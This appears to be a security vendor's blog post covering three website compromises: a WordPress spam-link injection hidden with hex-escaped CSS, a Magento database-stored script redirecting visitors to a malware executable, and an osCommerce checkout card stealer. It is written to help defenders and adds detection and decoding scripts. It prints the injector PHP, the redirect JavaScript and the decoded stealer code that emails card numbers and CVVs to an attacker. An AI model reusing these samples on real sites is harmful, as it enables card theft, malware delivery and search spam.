Hex’ing the CSS Style Attribute for Black Hat...

Dealing with Black Hat SEO injections in our daily operations is always fun and challenging at the same time. One day we may be working with heavily obfuscated code, and on another it can be just plain-text spam waiting to be removed.

In the last few months, we’ve seen and reported on different techniques used by attackers, ranging from DOM-based JavaScript obfuscation to plain CSS style manipulation. All of these attacks share the same goal: to make their spam blocks invisible to human visitors while keeping them accessible for indexing by search engine crawlers.

In a recent case, we found yet another simple but very interesting Black Hat SEO injection on a compromised website. The following malware had been added to the theme’s header.php of a WordPress site:

<?php
// Opening div whose style attribute is written as CSS hex escapes (decodes to display:none)
print '<div style="\64\69\73\70\6c\61\79:\6e\6f\6e\65">';
for ($i1 = 0; $i1 < 18; $i1++) {
  // Random number appended to each spam URL and anchor text
  $link1 = mt_rand(100, 9999999);
  echo "<a href=\"http://compromisedwebsite.com/wp-news.php?t=" .$link1. "\">viagra" .$link1. "</a><br>\r\n";
  echo "<a href=\"http:// compromisedwebsite.com/wp-stories.php?t=" .$link1. "\">casino" .$link1. "</a><br>\r\n";
  echo "<a href=\"http:// compromisedwebsite.com/wp-max.php?t=" .$link1. "\">drugs" .$link1. "</a><br>\r\n";
  $i1++; // second increment: the loop body runs 9 times rather than 18
} ; 
print '</div>';
?>

The PHP code then generates the following HTML in the site header:

<div style="\64\69\73\70\6c\61\79:\6e\6f\6e\65">
<a href="http://compromisedwebsite.com/wp-news.php?t=3743996">viagra3743996</a><br>
<a href="http:// compromisedwebsite.com/wp-stories.php?t=3743996">casino3743996</a><br>
...
<a href="http:// compromisedwebsite.com/wp-stories.php?t=8106883">casino8106883</a><br>
<a href="http:// compromisedwebsite.com/wp-max.php?t=8106883">drugs8106883</a><br>
</div>

The code uses CSS hex escape sequences (a backslash followed by the hex code of each character) to obfuscate the style attribute that hides the spam block. The browser’s CSS parser decodes these escapes transparently, while a plain-text search for display:none would not match them. Converting the escapes back to ASCII shows that it is just a normal display:none, the style used to hide the div element in the web browser:

$ echo "\64\69\73\70\6c\61\79" | xxd -r -p
display
$ echo "\6e\6f\6e\65" | xxd -r -p
none
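As an added example (not code from the original post), the following Python script does the same decoding programmatically and goes a step further than the single xxd call: it implements the CSS escape rule (backslash, one to six hex digits, optional trailing whitespace), normalizes each inline style declaration, and flags any style attribute that hides content (display:none or visibility:hidden) or that contains escapes at all, since escapes in an inline style are rarely legitimate. The sample HTML at the bottom is constructed for this example; the hostname example.invalid is a placeholder.

```python
import re

# CSS escape: backslash + 1..6 hex digits + optional single whitespace, or backslash + any char
_CSS_ESCAPE = re.compile(r'\\([0-9a-fA-F]{1,6})[ \t\n\r\f]?|\\(.)', re.S)
# Inline style attribute, single- or double-quoted
_STYLE_ATTR = re.compile(r'style\s*=\s*(["\'])(.*?)\1', re.I | re.S)

# Property/value pairs that make an element invisible to a human visitor
HIDING_RULES = {('display', 'none'), ('visibility', 'hidden')}


def decode_css_escapes(text):
    """Decode CSS backslash escapes the way a browser's CSS parser does."""
    def repl(m):
        if m.group(1):
            cp = int(m.group(1), 16)
            if cp == 0 or cp > 0x10FFFF or 0xD800 <= cp <= 0xDFFF:
                return '\uFFFD'  # invalid code point -> replacement character
            return chr(cp)
        return m.group(2)  # escaped non-hex character stands for itself
    return _CSS_ESCAPE.sub(repl, text)


def normalize_style(style):
    """Decode escapes, strip comments/!important/whitespace; return [(prop, value), ...]."""
    decoded = re.sub(r'/\*.*?\*/', '', decode_css_escapes(style), flags=re.S)
    decls = []
    for decl in decoded.split(';'):
        if ':' not in decl:
            continue
        prop, value = decl.split(':', 1)
        value = re.sub(r'!\s*important', '', value, flags=re.I)
        decls.append((re.sub(r'\s+', '', prop).lower(),
                      re.sub(r'\s+', ' ', value).strip().lower()))
    return decls


def is_hiding_style(style):
    """True if the (possibly escaped) inline style hides the element."""
    return any((p, v) in HIDING_RULES for p, v in normalize_style(style))


def scan_html(html):
    """Return one finding per suspicious style attribute in the given HTML."""
    findings = []
    for m in _STYLE_ATTR.finditer(html):
        raw = m.group(2)
        reasons = [f'{p}:{v}' for p, v in normalize_style(raw) if (p, v) in HIDING_RULES]
        if '\\' in raw:
            reasons.append('css-escapes-in-inline-style')
        if reasons:
            findings.append({'raw': raw, 'decoded': decode_css_escapes(raw), 'reasons': reasons})
    return findings


# Constructed sample: the injected pattern above plus benign and mixed-case variants
SAMPLE_HTML = r'''
<div style="\64\69\73\70\6c\61\79:\6e\6f\6e\65">
<a href="http://example.invalid/wp-news.php?t=3743996">viagra3743996</a><br>
</div>
<p style="color: red">normal text</p>
<span style="visibility: hidden !important">hidden the plain way</span>
<div style="d\69splay : NONE">partially escaped</div>
'''

if __name__ == '__main__':
    for f in scan_html(SAMPLE_HTML):
        print(f"{f['raw']!r} -> {f['decoded']!r}  reasons={f['reasons']}")
```

Run it against a fetched page (or the theme files themselves) rather than the rendered DOM: the point of the escapes is that the raw source and what the browser renders differ, so the raw source is what needs checking.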

As a site owner, it’s very important to have mechanisms in place to detect, prevent, and remediate issues before search engine crawlers fetch the hacked version of the site. The sooner we act on the problem, the smaller the effect on our SEO and Search Engine Results Page (SERP) entries. Use our SiteCheck scanner to regularly scan your site for unwanted spam, and let us know if you want it cleaned.

When Online Shopping leads to Malware download

Recently, during an incident response engagement, we worked on an interesting Magento website. The site was reported to have a strange redirection when users visited it. Without further ado, we started investigating the issue.

The site loaded pretty slowly on our end, which didn’t look right; something was holding it back. After further checking, we found a JavaScript include with a suspicious URL in the page source:

<script type="text/javascript" src=" hXXp://aleinvest[.]xyz/js/js"></script>

We discovered that the URL was served conditionally: on the first request we could see JavaScript code, but on the next request the code would no longer be returned. Luckily we had saved the JavaScript code on the first request. It redirected the user to download an executable named ‘plugin.exe’ from a Dropbox shared link:

function process() { window.location = "hXXps://www.dropbox[.]com/<snipped>/plugin.exe?dl=1"; } window.onerror = process; process()

We were able to download the ‘plugin.exe’ file (SHA256: 21f453cc5885ca7fbbb94bb0e54158c11c043318c794f7266158e7bb00190080) and quickly uploaded it to VirusTotal to get an overview of the threat. VirusTotal gave a 34/59 detection ratio for this file, which shows pretty clearly that it is malware.

Having confirmed the malicious component, we went back to the site infrastructure to find its source. It wasn’t long before we found that the JavaScript include had been stored inside the Magento database, in the core_config_data table, as shown in the screenshot below:

Right after the code was removed from the database, the site loaded much faster than before. Luckily the site had not been flagged or blacklisted by Google, so we could skip the blacklist removal request procedure for now.
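The post does not say which configuration path held the include, so as an added example (not code from the original post or from Magento) the script below shows one way to hunt for this class of injection: it walks every row of core_config_data, keeps the ones whose value contains markup that has no business in a config value, and rates a row as high severity when a script src points at a host outside the store’s own. The table is recreated in an in-memory SQLite database with the same column names so the example runs offline; the rows, the config paths used for them, the hostname shop.example and the placeholder attacker-host.invalid are all constructed for this example.

```python
import re
import sqlite3
from urllib.parse import urlparse

# Markup or code that should never appear inside a Magento config value
INJECTION_MARKERS = re.compile(r'<script\b|<iframe\b|javascript:|\beval\s*\(|document\.write', re.I)
# src of a <script> tag; the injected tag in this case had a space before the URL,
# so whitespace after the opening quote is tolerated
SCRIPT_SRC = re.compile(r'<script\b[^>]*\bsrc\s*=\s*["\']?\s*([^"\'\s>]+)', re.I)


def external_script_hosts(value, allowed_hosts):
    """Hosts of every <script src> in value that are not in the store's allow-list."""
    hosts = []
    for src in SCRIPT_SRC.findall(value):
        if src.startswith('//'):          # protocol-relative URL
            src = 'http:' + src
        host = urlparse(src).hostname
        if host is not None and host.lower() not in allowed_hosts:
            hosts.append(host.lower())
    return hosts


def find_suspicious_config(conn, allowed_hosts):
    """Scan core_config_data and return one finding per row carrying injected markup."""
    allowed = {h.lower() for h in allowed_hosts}
    findings = []
    rows = conn.execute(
        "SELECT config_id, scope, scope_id, path, value FROM core_config_data "
        "WHERE value IS NOT NULL ORDER BY config_id"
    )
    for config_id, scope, scope_id, path, value in rows:
        if not INJECTION_MARKERS.search(value):
            continue
        hosts = external_script_hosts(value, allowed)
        findings.append({
            'config_id': config_id,
            'scope': f'{scope}:{scope_id}',
            'path': path,
            'external_hosts': hosts,
            # off-site script: almost certainly injected; same-site script: still worth a look
            'severity': 'high' if hosts else 'review',
        })
    return findings


def build_sample_db():
    """Constructed in-memory stand-in for the Magento core_config_data table."""
    conn = sqlite3.connect(':memory:')
    conn.execute(
        "CREATE TABLE core_config_data (config_id INTEGER PRIMARY KEY, scope TEXT, "
        "scope_id INTEGER, path TEXT, value TEXT)"
    )
    conn.executemany(
        "INSERT INTO core_config_data (scope, scope_id, path, value) VALUES (?, ?, ?, ?)",
        [
            ('default', 0, 'web/unsecure/base_url', 'http://shop.example/'),
            ('default', 0, 'design/head/includes',
             '<link rel="stylesheet" href="/skin/frontend/default/default/css/custom.css" />\n'
             '<script type="text/javascript" src=" http://attacker-host.invalid/js/js"></script>'),
            ('stores', 1, 'design/footer/absolute_footer',
             '<script src="https://shop.example/js/analytics.js"></script>'),
            ('default', 0, 'general/store_information/name', 'Example Shop'),
        ],
    )
    conn.commit()
    return conn


if __name__ == '__main__':
    for f in find_suspicious_config(build_sample_db(), ['shop.example']):
        print(f"[{f['severity']}] config_id={f['config_id']} {f['scope']} {f['path']} "
              f"external={f['external_hosts']}")
```

Against a live store the same filter is a single MySQL query, for example SELECT config_id, scope, scope_id, path, value FROM core_config_data WHERE value LIKE '%<script%' OR value LIKE '%<iframe%'; the script adds the host check so that a store’s own analytics include is not reported with the same weight as an off-site one.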

A quick Google search for this threat turns up only a few related infections so far, but all of them are on Magento websites.

If you look at our previous Labs notes on Magento sites, most of the threats are heavily associated with credit card stealers. Fret not! Whether it is credit card stealers, Black Hat SEO, or malware redirects, let us know if you want professional security help. We are here to secure and protect your Magento website!

Credit Card Stealer on osCommerce

We regularly detect malware that targets payment modules on compromised ecommerce websites, mainly Magento.

Recently we stumbled upon the same threat on osCommerce. The malicious code was found inside ./catalog/checkout_confirmation.php and was obfuscated as below:

…eval(gzinflate(str_rot13(base64_decode('Dc9UsqJAAADQ43x/sRAQFHdJ5ByUBoTNRxMaVg0i0dPPvBu8ZYXdqfrWGGhjLkIZ/JRK5mJE5lBEnn5Dd7qA3zbFyNbzI47VvBPpQ…wSmhNUk33O2C+uFKeOUAGdb8UyETzPEp1nvg7hIgQB5355jGg9LQuJGxB31rYoBLc7LHDv0hwC8L3ocO4KlLduNn6ntts7EmJ1z1lZuZ4tFt4U12paYTRI+dIKnefP7+/vn38='))));…

When decoded, the code turned out to be a credit card stealer. It sends a copy of the stolen credit card details to the attacker’s email address and appends them to an image file as a backup. This happens every time a customer submits payment details during checkout:

$recipient = "<attacker’s-email-address>@gmail.com";
$subject = "www.<compromised-site>.com";
$mailheaders = "From: www.<compromised-site>.com <sales@ www.<compromised-site>.com >";
$address4 = tep_address_format($order->billing['format_id'], $order->billing, 1, ' ', '<br>');
$ip = getenv("REMOTE_ADDR");
…
$message .= "Name on card: ".$_POST['cc_owner']." CC: ".$_POST['cc_number']." Exp: ".$_POST['cc_expires_month']."/".$_POST['cc_expires_year']." CVV2: ".$_POST['cc_ccv']."\n";
…
mail($recipient, $subject, $message, $mailheaders);
$f = fopen('/<path to public directory>/catalog/images/oscommerce2.gif','a');
fputs($f, $message . "\n");
fclose($f);
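The eval(gzinflate(str_rot13(base64_decode(...)))) wrapper is a standard PHP packing chain, and unwrapping it by hand is error-prone because str_rot13 is applied to the raw deflate bytes, not to text. As an added example (not code from the original post), the Python script below undoes each layer in the same order PHP would (base64, then rot13 over bytes, then raw DEFLATE), repeats until no wrapper is left so stacked layers are handled too, and then checks the decoded PHP for the three behaviours seen in the stealer above: reading raw card fields from $_POST, calling mail(), and appending to a file under images/. The packed sample is constructed inside the script from a short stand-in snippet modelled on the decoded code above; it is not the real payload, and the path /var/www/catalog is a placeholder.

```python
import base64
import re
import zlib

# One packing layer as it appeared in checkout_confirmation.php
LAYER_PATTERN = re.compile(
    r"eval\s*\(\s*gzinflate\s*\(\s*str_rot13\s*\(\s*base64_decode\s*\(\s*'([^']+)'\s*\)\s*\)\s*\)\s*\)",
    re.I,
)


def rot13_bytes(data):
    """PHP str_rot13() on raw bytes: rotate A-Z and a-z only, leave every other byte alone."""
    out = bytearray()
    for b in data:
        if 65 <= b <= 90:
            out.append((b - 65 + 13) % 26 + 65)
        elif 97 <= b <= 122:
            out.append((b - 97 + 13) % 26 + 97)
        else:
            out.append(b)
    return bytes(out)


def gzinflate(data):
    """PHP gzinflate(): raw DEFLATE stream with no zlib/gzip header, hence wbits=-15."""
    return zlib.decompress(data, -15)


def decode_layer(blob):
    """Undo one layer in PHP's evaluation order: base64_decode -> str_rot13 -> gzinflate."""
    return gzinflate(rot13_bytes(base64.b64decode(blob))).decode('latin-1')


def unwrap(source, max_depth=10):
    """Strip nested layers; return (plain PHP, number of layers removed)."""
    depth = 0
    while depth < max_depth:
        m = LAYER_PATTERN.search(source)
        if m is None:
            return source, depth
        source = decode_layer(m.group(1))
        depth += 1
    raise ValueError('more than %d nested layers' % max_depth)


# Behaviours of the decoded stealer, as regexes over the plain PHP
INDICATORS = {
    'reads_card_fields': re.compile(r"\$_POST\[\s*['\"]cc_(?:number|ccv|owner|expires_\w+)['\"]\s*\]"),
    'mails_out': re.compile(r"\bmail\s*\("),
    'writes_to_image_file': re.compile(r"fopen\s*\([^)]*images/[^)]*\.(?:gif|jpe?g|png)['\"]"),
}


def card_stealer_indicators(php_source):
    """Names of the indicators present in the given PHP source."""
    return [name for name, pat in INDICATORS.items() if pat.search(php_source)]


# --- constructed sample, built here rather than taken from the page ---
def encode_layer(php_source):
    """Pack one layer the way the attacker's tool must have: gzdeflate -> str_rot13 -> base64."""
    c = zlib.compressobj(9, zlib.DEFLATED, -15)
    deflated = c.compress(php_source.encode('latin-1')) + c.flush()
    blob = base64.b64encode(rot13_bytes(deflated)).decode('ascii')
    return "eval(gzinflate(str_rot13(base64_decode('%s'))));" % blob


INNER_SAMPLE = (
    '$message .= "CC: ".$_POST[\'cc_number\']." CVV2: ".$_POST[\'cc_ccv\']."\\n";\n'
    'mail($recipient, $subject, $message, $mailheaders);\n'
    '$f = fopen(\'/var/www/catalog/images/oscommerce2.gif\', \'a\');\n'
    'fputs($f, $message);\n'
)
# Two stacked layers, to exercise the loop in unwrap()
SAMPLE_SOURCE = "<?php\n" + encode_layer(encode_layer(INNER_SAMPLE)) + "\n?>"

if __name__ == '__main__':
    decoded, depth = unwrap(SAMPLE_SOURCE)
    print('layers removed:', depth)
    print(decoded)
    print('indicators:', card_stealer_indicators(decoded))
```

The decoder never evaluates anything: it replaces the eval() at each step with a string return, so a sample can be inspected on an analysis box without running attacker code. The indicator list is deliberately narrow (the exact field names and file pattern from this case); widen it to the payment module’s own field names when checking another cart.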

If you're using osCommerce as your ecommerce solution, always check your core files, especially ./catalog/checkout_confirmation.php, for modified content, and run regular scans. As always, if you need a professional service for your osCommerce website, you can count on our Website AntiVirus service.